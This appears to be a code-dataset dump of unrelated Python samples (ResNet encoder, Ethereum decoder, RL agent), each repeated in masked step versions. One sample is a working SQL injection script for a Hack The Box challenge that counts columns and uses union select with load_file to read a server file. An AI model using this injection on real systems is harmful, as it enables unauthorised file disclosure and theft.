* 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\nif __name__ == '__main__':\n test_resnet()\n",
"step-5": "from __future__ import absolute_import, print_function, division, unicode_literals\nimport tensorflow as tf\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2),\n tf.keras.layers.ReLU(),\n tf.keras.layers.Dense(conf.d_model)])\n return model\n\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k=conf.k, linear=conf.linear)\n return model\n\n\ndef get_stochastic_linear(conf):\n model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(.3),\n tf.keras.layers.Dense(conf.d_model * 2),\n tf.keras.layers.ReLU(),\n tf.keras.layers.GaussianNoise(.3),\n tf.keras.layers.Dense(conf.d_model)])\n return model\n\n\n# noinspection PyAbstractClass\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=strides, padding='same',\n use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same',\n use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != (filters * self.EXPANSION):\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION * filters, kernel_size=1, strides=strides,\n use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\n# noinspection PyAbstractClass\nclass ResNet(tf.keras.Model):\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1, k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([\n self._make_layer(block, self.base, num_blocks[0], stride=1),\n self._make_layer(block, self.base * 2, num_blocks[1], stride=2),\n self._make_layer(block, self.base * 4, num_blocks[2], stride=2),\n self._make_layer(block, self.base * 8, num_blocks[3], stride=2)\n ])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len, data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\ndef test_resnet():\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)\n a = tf.ones([7, 32, 32, 3])\n b = model(a)\n print(b)\n\n\nif __name__ == '__main__':\n test_resnet()\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
N, D = map(int, input().split())
ans = 0
D2 = D*D
for i in range(N):
x, y = map(int, input().split())
if (x*x+y*y) <= D2:
ans += 1
print(ans)
|
normal
|
{
"blob_id": "947055d1d6acc50e1722d79ea30e327414cd9c41",
"index": 8523,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(N):\n x, y = map(int, input().split())\n if x * x + y * y <= D2:\n ans += 1\nprint(ans)\n",
"step-3": "N, D = map(int, input().split())\nans = 0\nD2 = D * D\nfor i in range(N):\n x, y = map(int, input().split())\n if x * x + y * y <= D2:\n ans += 1\nprint(ans)\n",
"step-4": "N, D = map(int, input().split())\nans = 0\nD2 = D*D\nfor i in range(N):\n x, y = map(int, input().split())\n if (x*x+y*y) <= D2:\n ans += 1\n\nprint(ans)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv)<2:
print("Syntax : python %s <port>")%(str(sys.argv[0]))
else:
print('-'*55)
print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]")
print('-'*55)
r=requests.session()
port=str(sys.argv[1])
url="http://docker.hackthebox.eu:"
url=url+port
uri="/portfolio.php?id=1"
url=url+uri
print("[*]SQLi Affected URI : %s")%(uri)
print("[*]Counting Columns")
for x in range(1,20):
payload=(" order by %i --+")%(x)
nurl=url+payload
op=r.get(nurl)
soup=BeautifulSoup(op.text,'html.parser')
soup=soup.find('p')
soup=str(soup)
size=len(soup.split())
print("[*]Page size at order by %s : %s")%(x,size)
if size < 36 :
col= x-1
break
print("-"*55)
print("[*]Number of Columns : %d")%(col)
print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI")
print("[*]Trying to read content of \'/var/www/html/administrat/panel.php\'")
upayload=" union all select 1"
for x in range(2,col+1):
x=str(x)
upayload=upayload+","+x
upayload=upayload+" --+"
url=url+upayload
print("[*]Executing. : %s")%(url)
op=r.get(url)
op=str(op.text)
if op.find("2"):
print("[*]Column 2 is reflected");
print("[*]Injecting payloads in column 2....");
upayload=upayload.replace('2','load_file(\'/var/www/html/administrat/panel.php\')')
url="http://docker.hackthebox.eu:"+port+uri+upayload
print("[*]Excecuting : %s")%(url)
op=r.get(url)
op=str(op.text)
op=re.search("HTB.*?<",op)
op=str(op.group())
op=op.replace('<','')
print("-"*55)
print("[*]Flag : %s")%(op)
|
normal
|
{
"blob_id": "88ec9484e934ce27b13734ca26f79df71b7677e6",
"index": 82,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\n<mask token>\nprint('[*]Executing. : %s') % url\n<mask token>\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\n<mask token>\nprint('[*]Excecuting : %s') % url\n<mask token>\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-3": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-4": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-5": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv)<2:\n print(\"Syntax : python %s <port>\")%(str(sys.argv[0]))\nelse:\n print('-'*55)\n print(\"HTB WEB-CHALLENGE coded by ZyperX [Freelance]\")\n print('-'*55)\n r=requests.session()\n port=str(sys.argv[1])\n url=\"http://docker.hackthebox.eu:\"\n url=url+port\n uri=\"/portfolio.php?id=1\"\n url=url+uri\n print(\"[*]SQLi Affected URI : %s\")%(uri)\n print(\"[*]Counting Columns\")\n for x in range(1,20):\n payload=(\" order by %i --+\")%(x)\n nurl=url+payload\n op=r.get(nurl)\n soup=BeautifulSoup(op.text,'html.parser')\n soup=soup.find('p')\n soup=str(soup)\n size=len(soup.split())\n print(\"[*]Page size at order by %s : %s\")%(x,size)\n if size < 36 :\n col= x-1\n break \n print(\"-\"*55)\n print(\"[*]Number of Columns : %d\")%(col)\n print(\"[*]Web App Vulnerable with FILE PRIVILEGE SQLI\")\n print(\"[*]Trying to read content of \\'/var/www/html/administrat/panel.php\\'\")\n upayload=\" union all select 1\"\n for x in range(2,col+1):\n x=str(x)\n upayload=upayload+\",\"+x\nupayload=upayload+\" --+\"\nurl=url+upayload\nprint(\"[*]Executing. : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nif op.find(\"2\"):\n print(\"[*]Column 2 is reflected\");\n print(\"[*]Injecting payloads in column 2....\");\nupayload=upayload.replace('2','load_file(\\'/var/www/html/administrat/panel.php\\')')\nurl=\"http://docker.hackthebox.eu:\"+port+uri+upayload\nprint(\"[*]Excecuting : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nop=re.search(\"HTB.*?<\",op)\nop=str(op.group())\nop=op.replace('<','')\nprint(\"-\"*55)\nprint(\"[*]Flag : %s\")%(op)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from ethereum.abi import (
decode_abi,
normalize_name as normalize_abi_method_name,
method_id as get_abi_method_id)
from ethereum.utils import encode_int, zpad, decode_hex
import json
import time
from web3 import Web3, HTTPProvider, TestRPCProvider
from solc import compile_source
from web3.contract import ConciseContract
import sys
import os
Cpath = os.path.dirname(os.path.realpath(__file__))
host = 'localhost'
TID = sys.argv[1]
# web3.py instance
w3 = Web3(HTTPProvider('http://'+host+':3000'))
f = open(Cpath+'/abi','r')
line = f.readline()
Jline = json.loads(line)
f.close()
abi = Jline
Transaction = w3.eth.getTransaction(TID)
#print(Transaction.input)
def decode_contract_call(contract_abi: list, call_data: str):
call_data_bin = decode_hex(call_data)
method_signature = call_data_bin[:4]
for description in contract_abi:
if description.get('type') != 'function':
continue
method_name = normalize_abi_method_name(description['name'])
arg_types = [item['type'] for item in description['inputs']]
method_id = get_abi_method_id(method_name, arg_types)
if zpad(encode_int(method_id), 4) == method_signature:
try:
args = decode_abi(arg_types, call_data_bin[4:])
except AssertionError:
# Invalid args
continue
return method_name, args
result = decode_contract_call(abi,Transaction.input)
#result = decode_contract_call(abi,"0xa9059cbb0000000000000000000000006cd5d27785e38b28a0d9656bcc795d90a4d670c500000000000000000000000000000000000000000000000000000000000001f4")
print(result)
print(Transaction['from'])
|
normal
|
{
"blob_id": "6437cb90ebaed7cf59df780062ebccf77fcef084",
"index": 4123,
"step-1": "<mask token>\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\n<mask token>\n",
"step-2": "<mask token>\nf.close()\n<mask token>\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\n<mask token>\nprint(result)\nprint(Transaction['from'])\n",
"step-3": "<mask token>\nCpath = os.path.dirname(os.path.realpath(__file__))\nhost = 'localhost'\nTID = sys.argv[1]\nw3 = Web3(HTTPProvider('http://' + host + ':3000'))\nf = open(Cpath + '/abi', 'r')\nline = f.readline()\nJline = json.loads(line)\nf.close()\nabi = Jline\nTransaction = w3.eth.getTransaction(TID)\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\nresult = decode_contract_call(abi, Transaction.input)\nprint(result)\nprint(Transaction['from'])\n",
"step-4": "from ethereum.abi import decode_abi, normalize_name as normalize_abi_method_name, method_id as get_abi_method_id\nfrom ethereum.utils import encode_int, zpad, decode_hex\nimport json\nimport time\nfrom web3 import Web3, HTTPProvider, TestRPCProvider\nfrom solc import compile_source\nfrom web3.contract import ConciseContract\nimport sys\nimport os\nCpath = os.path.dirname(os.path.realpath(__file__))\nhost = 'localhost'\nTID = sys.argv[1]\nw3 = Web3(HTTPProvider('http://' + host + ':3000'))\nf = open(Cpath + '/abi', 'r')\nline = f.readline()\nJline = json.loads(line)\nf.close()\nabi = Jline\nTransaction = w3.eth.getTransaction(TID)\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n continue\n return method_name, args\n\n\nresult = decode_contract_call(abi, Transaction.input)\nprint(result)\nprint(Transaction['from'])\n",
"step-5": "from ethereum.abi import (\n decode_abi,\n normalize_name as normalize_abi_method_name,\n method_id as get_abi_method_id)\nfrom ethereum.utils import encode_int, zpad, decode_hex\n\nimport json\nimport time\nfrom web3 import Web3, HTTPProvider, TestRPCProvider\nfrom solc import compile_source\nfrom web3.contract import ConciseContract\nimport sys\nimport os\nCpath = os.path.dirname(os.path.realpath(__file__))\n\nhost = 'localhost'\nTID = sys.argv[1]\n\n# web3.py instance\nw3 = Web3(HTTPProvider('http://'+host+':3000'))\nf = open(Cpath+'/abi','r')\nline = f.readline()\nJline = json.loads(line)\nf.close()\n\nabi = Jline\n\nTransaction = w3.eth.getTransaction(TID)\n#print(Transaction.input)\n\n\ndef decode_contract_call(contract_abi: list, call_data: str):\n call_data_bin = decode_hex(call_data)\n method_signature = call_data_bin[:4]\n for description in contract_abi:\n if description.get('type') != 'function':\n continue\n method_name = normalize_abi_method_name(description['name'])\n arg_types = [item['type'] for item in description['inputs']]\n method_id = get_abi_method_id(method_name, arg_types)\n if zpad(encode_int(method_id), 4) == method_signature:\n try:\n args = decode_abi(arg_types, call_data_bin[4:])\n except AssertionError:\n # Invalid args\n continue\n return method_name, args\n\nresult = decode_contract_call(abi,Transaction.input)\n#result = decode_contract_call(abi,\"0xa9059cbb0000000000000000000000006cd5d27785e38b28a0d9656bcc795d90a4d670c500000000000000000000000000000000000000000000000000000000000001f4\")\nprint(result)\nprint(Transaction['from'])\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import logging
import time
import random
import pickle
import os
from sys import maxsize
import torch
from tensorboardX import SummaryWriter
from baselines.common.schedules import LinearSchedule
from abp.utils import clear_summary_path
from abp.models.feature_q_model import feature_q_model
from abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom
import numpy as np
logger = logging.getLogger('root')
use_cuda = torch.cuda.is_available()
FloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
LongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor
IntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor
ByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor
Tensor = FloatTensor
class SADQ_GQF(object):
"""Adaptive which uses the SADQ algorithm"""
def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):
super(SADQ_GQF, self).__init__()
self.name = name
#self.choices = choices
self.network_config = network_config
self.reinforce_config = reinforce_config
self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)
self.learning = True
self.explanation = False
self.state_length = state_length
self.features = 0
self.feature_len = feature_len
# Global
self.steps = 0
self.reward_history = []
self.episode_time_history = []
self.best_reward_mean = -maxsize
self.episode = 0
self.feature_len = feature_len
self.features = None
self.reset()
self.memory_resotre = memory_resotre
reinforce_summary_path = self.reinforce_config.summaries_path + "/" + self.name
if not self.network_config.restore_network:
clear_summary_path(reinforce_summary_path)
else:
self.restore_state()
self.summary = SummaryWriter(log_dir=reinforce_summary_path)
self.eval_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
# self.target_model.eval_mode()
self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,
initial_p=self.reinforce_config.beta_initial,
final_p=self.reinforce_config.beta_final)
self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,
initial_p=self.reinforce_config.starting_epsilon,
final_p=self.reinforce_config.final_epsilon)
# def __del__(self):
# self.save()
# self.summary.close()
def should_explore(self):
self.epsilon = self.epsilon_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Epsilon' % self.name,
scalar_value=self.epsilon,
global_step=self.steps)
return random.random() < self.epsilon
def predict(self, state, isGreedy = False, is_random = False):
if self.learning:
self.steps += 1
# add to experience
if self.previous_state is not None and self.learning and self.current_reward is not None:
state_crr = np.unique(state, axis=0)
self.memory.add(self.previous_state,
None,
self.current_reward,
state_crr.reshape(-1, self.state_length), 0,
self.features)
# print("not final : {}".format(self.current_reward) )
# print(0, self.features)
if self.learning and self.should_explore() and not isGreedy:
q_values = None
fv = None
choice = random.choice(list(range(len(state))))
action = choice
else:
with torch.no_grad():
features_vector, q_values = self.eval_model.predict_batch(Tensor(state))
q_values = FloatTensor(q_values).view(-1)
_, choice = q_values.max(0)
action = choice
fv = features_vector[choice]
# print("q_value : {}".format(q_values))
# input()
if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:
logger.debug("Replacing target model for %s" % self.name)
if self.reinforce_config.replace_frequency != 1:
self.target_model.replace(self.eval_model)
else:
self.target_model.replace_soft(self.eval_model)
# self.target_model.eval_mode()
if (self.learning and
self.steps > self.reinforce_config.update_start and
self.steps % self.reinforce_config.update_steps == 0):
self.update_time -= time.time()
self.update()
self.update_time += time.time()
self.current_reward = 0
self.previous_state = state[action]
#self.previous_action = action
return choice, fv#,q_values
def disable_learning(self, is_save = False):
logger.info("Disabled Learning for %s agent" % self.name)
if is_save:
# self.save()
self.save(force = True)
self.learning = False
self.episode = 0
def enable_learning(self):
logger.info("enabled Learning for %s agent" % self.name)
self.learning = True
self.reset()
def end_episode(self, state):
if not self.learning:
return
# print("end:")
# print(self.current_reward)
# input()
episode_time = time.time() - self.episode_time
self.reward_history.append(self.total_reward)
self.episode_time_history.append(episode_time)
total_time = sum(self.episode_time_history)
avg_time = total_time / len(self.episode_time_history)
logger.info("End of Episode %d, "
"Total reward %.2f, "
"Epsilon %.2f" % (self.episode + 1,
self.total_reward,
self.epsilon))
logger.debug("Episode Time: %.2fs (%.2fs), "
"Prediction Time: %.2f, "
"Update Time %.2f" % (episode_time,
avg_time,
self.prediction_time,
self.update_time))
self.episode += 1
self.summary.add_scalar(tag='%s/Episode Reward' % self.name,
scalar_value=self.total_reward,
global_step=self.episode)
self.memory.add(self.previous_state,
None,
self.current_reward,
state.reshape(-1, self.state_length), 1,
self.features)
# print("final : {}".format(self.current_reward) )
# input()
# print(1, self.features)
self.save()
self.reset()
def reset(self):
self.episode_time = time.time()
self.current_reward = 0
self.total_reward = 0
self.previous_state = None
self.previous_action = None
self.prediction_time = 0
self.update_time = 0
self.features = None
def restore_state(self):
restore_path = self.network_config.network_path + "/adaptive.info"
if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:
logger.info("Restoring state from %s" % self.network_config.network_path)
with open(restore_path, "rb") as file:
info = pickle.load(file)
self.steps = info["steps"]
# self.best_reward_mean = info["best_reward_mean"]
self.episode = info["episode"]
self.memory.load(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
def save(self, force=False, appendix=""):
info = {
"steps": self.steps,
"best_reward_mean": self.best_reward_mean,
"episode": self.episode
}
if (len(self.reward_history) >= self.network_config.save_steps and
self.episode % self.network_config.save_steps == 0) or force:
total_reward = sum(self.reward_history[-self.network_config.save_steps:])
current_reward_mean = total_reward / self.network_config.save_steps
if force: #or current_reward_mean >= self.best_reward_mean:
print("*************saved*****************", current_reward_mean, self.best_reward_mean)
if not force:
self.best_reward_mean = current_reward_mean
logger.info("Saving network. Found new best reward (%.2f)" % total_reward)
self.eval_model.save_network(appendix = appendix)
self.target_model.save_network(appendix = appendix)
# self.eval_model.save_network()
# self.target_model.save_network()
with open(self.network_config.network_path + "/adaptive.info", "wb") as file:
pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)
self.memory.save(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
else:
logger.info("The best reward is still %.2f. Not saving" % self.best_reward_mean)
def reward(self, r):
self.total_reward += r
self.current_reward += r
def passFeatures(self, features):
self.features = features.copy()
return
def summary_test(self, reward, epoch):
self.summary.add_scalar(tag='%s/eval reward' % self.name,
scalar_value=reward, global_step=epoch * 40)
def summary_GVFs_loss(self, loss, epoch):
self.summary.add_scalar(tag='%s/GVFs loss' % self.name,
scalar_value=loss, global_step=epoch * 40)
def update(self):
if len(self.memory._storage) <= self.reinforce_config.batch_size:
return
# self.eval_model.train_mode()
beta = self.beta_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Beta' % self.name,
scalar_value=beta, global_step=self.steps)
if self.reinforce_config.use_prior_memory:
batch = self.memory.sample(self.reinforce_config.batch_size, beta)
(states, actions, reward, next_states,
is_terminal, weights, batch_idxes) = batch
self.summary.add_histogram(tag='%s/Batch Indices' % self.name,
values=Tensor(batch_idxes),
global_step=self.steps)
else:
batch = self.memory.sample(self.reinforce_config.batch_size)
(states, actions, reward, next_states, is_terminal, features_vector) = batch
states = FloatTensor(states)
# print(states.size())
# next_states = FloatTensor(next_states)
terminal = FloatTensor([1 if t else 0 for t in is_terminal])
reward = FloatTensor(reward)
features_vector = FloatTensor(features_vector)
batch_index = torch.arange(self.reinforce_config.batch_size,
dtype=torch.long)
# Current Q Values
feature_values, q_values = self.eval_model.predict_batch(states)
q_values = q_values.flatten()
q_max = []
f_max = []
for i, ns in enumerate(next_states):
feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))
q_value_max, idx = q_n.max(0)
features_max = feature_n[idx]
q_max.append(q_value_max)
if self.network_config.version in ["v10", "v11"]:
# print(features_max)
# print(ns[idx, 63:67])
# print(states[i, 63:67])
# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), states.size())
features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]
features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]
features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]
features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]
features_max[features_max == float('inf')] = 0
# print(features_max)
# input()
f_max.append(features_max.view(-1))
# if torch.sum(terminal == torch.sum(features_vector, dim = 1)) != len(terminal):
# print(terminal)
# print(features_vector)
# input()
q_max = torch.stack(q_max, dim = 1).view(-1)
f_max = torch.stack(f_max)
q_max = (1 - terminal) * q_max
f_max = (1 - terminal.view(-1, 1)) * f_max
q_target = reward + self.reinforce_config.discount_factor * q_max
f_target = features_vector + self.reinforce_config.discount_factor * f_max
# if torch.sum(reward).item() > 0:
# print(reward)
# print(feature_values)
# print(q_target)
# print(q_values)
# input()
# update model
if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:
# print("1")
# print(features_vector)
# print("2")
# print(feature_values)
# print("3")
# print(f_target)
# print("4")
# print(f_max)
# print("5")
# print(states.tolist())
# input()
f_target[f_target != f_target] = 0
self.eval_model.fit(q_values, q_target, feature_values, f_target)
# Update priorities
if self.reinforce_config.use_prior_memory:
td_errors = q_values - q_target
new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps
self.memory.update_priorities(batch_idxes, new_priorities.data)
def load_model(self, model):
self.eval_model.replace(model)
def load_weight(self, weight_dict):
self.eval_model.load_weight(weight_dict)
def load_model(self, model):
self.eval_model.replace(model)
def load_weight(self, new_feature_weights, new_q_weights):
self.eval_model.feautre_model.load_state_dict(new_feature_weights)
self.eval_model.q_model.load_state_dict(new_q_weights)
|
normal
|
{
"blob_id": "424a0e8a7a80e24aec4bdb9b8c84fd9a5e6090c6",
"index": 6782,
